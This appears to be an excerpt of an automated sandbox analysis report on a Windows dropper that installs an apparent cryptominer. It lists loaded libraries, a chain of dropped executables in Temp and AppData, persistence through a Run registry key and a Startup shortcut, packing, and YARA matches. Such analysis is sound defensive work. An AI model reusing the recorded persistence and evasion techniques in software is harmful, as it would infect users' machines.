                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: powrprof.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: umpdc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: napinsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: pnrpnsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: wshbth.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: nlaapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: winrnr.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: h2UFp4aCRq.exe Static PE information: Image base 0x140000000 > 0x60000000
                  Source: h2UFp4aCRq.exe Static file information: File size 5061451 > 1048576
                  Source: h2UFp4aCRq.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: h2UFp4aCRq.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: h2UFp4aCRq.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: h2UFp4aCRq.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: h2UFp4aCRq.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: h2UFp4aCRq.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: h2UFp4aCRq.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdb source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: C:\Users\danie\Desktop\Sources\Miner Source1\obj\x86\Debug\miner.pdbP source: rolex.exe, 00000003.00000003.1726307942.000001FEAC2EE000.00000004.00000020.00020000.00000000.sdmp, yondex.exe, 00000004.00000000.1730928897.0000000000A15000.00000002.00000001.01000000.0000000B.sdmp, yondex.exe.3.dr
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: h2UFp4aCRq.exe, rolex.exe.0.dr
                  Source: h2UFp4aCRq.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: h2UFp4aCRq.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: h2UFp4aCRq.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: h2UFp4aCRq.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: h2UFp4aCRq.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Unpacked PE file: 5.2.Driver.exe.140000000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: Yara match File source: 4.0.yondex.exe.690000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara match File source: 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: rolex.exe PID: 6584, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: yondex.exe PID: 6936, type: MEMORYSTR
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, type: DROPPED
                  Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6321171
                  Source: rolex.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x469fd4
                  Source: h2UFp4aCRq.exe Static PE information: real checksum: 0x0 should be: 0x4e37cd
                  Source: Driver.exe.4.dr Static PE information: real checksum: 0x3f8bb4 should be: 0x3fb52d
                  Source: yondex.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x401e1a
                  Source: h2UFp4aCRq.exe Static PE information: section name: .didat
                  Source: h2UFp4aCRq.exe Static PE information: section name: _RDATA
                  Source: rolex.exe.0.dr Static PE information: section name: .didat
                  Source: rolex.exe.0.dr Static PE information: section name: _RDATA
                  Source: Driver.exe.4.dr Static PE information: section name: .MPRESS1
                  Source: Driver.exe.4.dr Static PE information: section name: .MPRESS2
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Code function: 0_2_00007FF655965156 push rsi; retf 0_2_00007FF655965157
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe Code function: 0_2_00007FF655965166 push rsi; retf 0_2_00007FF655965167
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe Code function: 3_2_00007FF7AB4D5166 push rsi; retf 3_2_00007FF7AB4D5167
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe Code function: 3_2_00007FF7AB4D5156 push rsi; retf 3_2_00007FF7AB4D5157
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C704E7 push eax; retn 0000h 12_2_00C70502
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C704E7 push eax; retn 0000h 12_2_00C7055A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C71027 push ds; retn 0000h 12_2_00C7102A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C70838 push ss; retn 0000h 12_2_00C7083A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C70569 push ecx; retn 0000h 12_2_00C7056A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C70577 push ecx; retn 0000h 12_2_00C7057A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C70E99 push ds; retn 0000h 12_2_00C70E9A
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Code function: 12_2_00C70FC8 push ds; retn 0000h 12_2_00C70FCA
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe File created: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe (copy)
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe File created: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Driver
                  Source: C:\Users\user\Desktop\h2UFp4aCRq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe, Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe, Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
